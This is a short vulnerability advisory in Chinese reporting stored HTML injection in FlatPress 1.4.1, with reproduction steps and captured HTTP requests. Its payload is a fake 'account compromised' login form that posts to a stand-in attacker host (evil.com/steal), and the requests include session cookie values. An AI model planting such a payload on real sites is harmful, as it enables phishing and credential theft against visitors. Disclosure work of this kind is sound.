漏洞标题：存储型HTML注入 - flatpressv1.4.1

日期：09/2025

漏洞作者：Andrey Stoykov

版本：1.4.1

测试环境：Debian 12

博客：https://msecureltd.blogspot.com/2025/09/friday-fun-pentest-series-41-stored.html

存储型HTML注入：

复现步骤：

• 使用管理员用户登录并访问"Main" > “New Entry” > “Write Entry”，在描述中输入载荷"[html]

  SECURITY ALERT

  Your account has been compromised. Please login again:

  <form action=“https://evil.com/steal";>Login
  [/html]”

// HTTP POST请求

POST /FlatPressns3ufyfxkj/admin.php?p=entry&action=write HTTP/1.1 Host: demos5.softaculous.com Cookie: __Secure-fpsess_fp-ea857882=ac74031571a2427832d0abef5c255d9e User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0 […]

_wpnonce=ee76fd6c94&_wp_http_referer=/FlatPressns3ufyfxkj/admin.php?p=entry&action=write&date_hour=16&date_minute=12&date_second=51&date_month=09&date_day=21&date_year=2025&subject=HTMLi&timestamp=1758471158&entry=&attachselect=– Selection –&imageselect=– Selection –&content=[html]

// HTTP响应

HTTP/1.1 302 Found Date: Sun, 21 Sep 2025 16:12:55 GMT Server: FlatPress […]

// HTTP GET请求

GET /FlatPressns3ufyfxkj/index.php/2025/09/21/htmli/ HTTP/1.1 Host: demos5.softaculous.com Cookie: __Secure-fpsess_fp-ea857882=ac74031571a2427832d0abef5c255d9e User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0 […]

// HTTP响应

HTTP/1.1 200 OK Date: Sun, 21 Sep 2025 16:12:58 GMT Server: FlatPress […]

[…]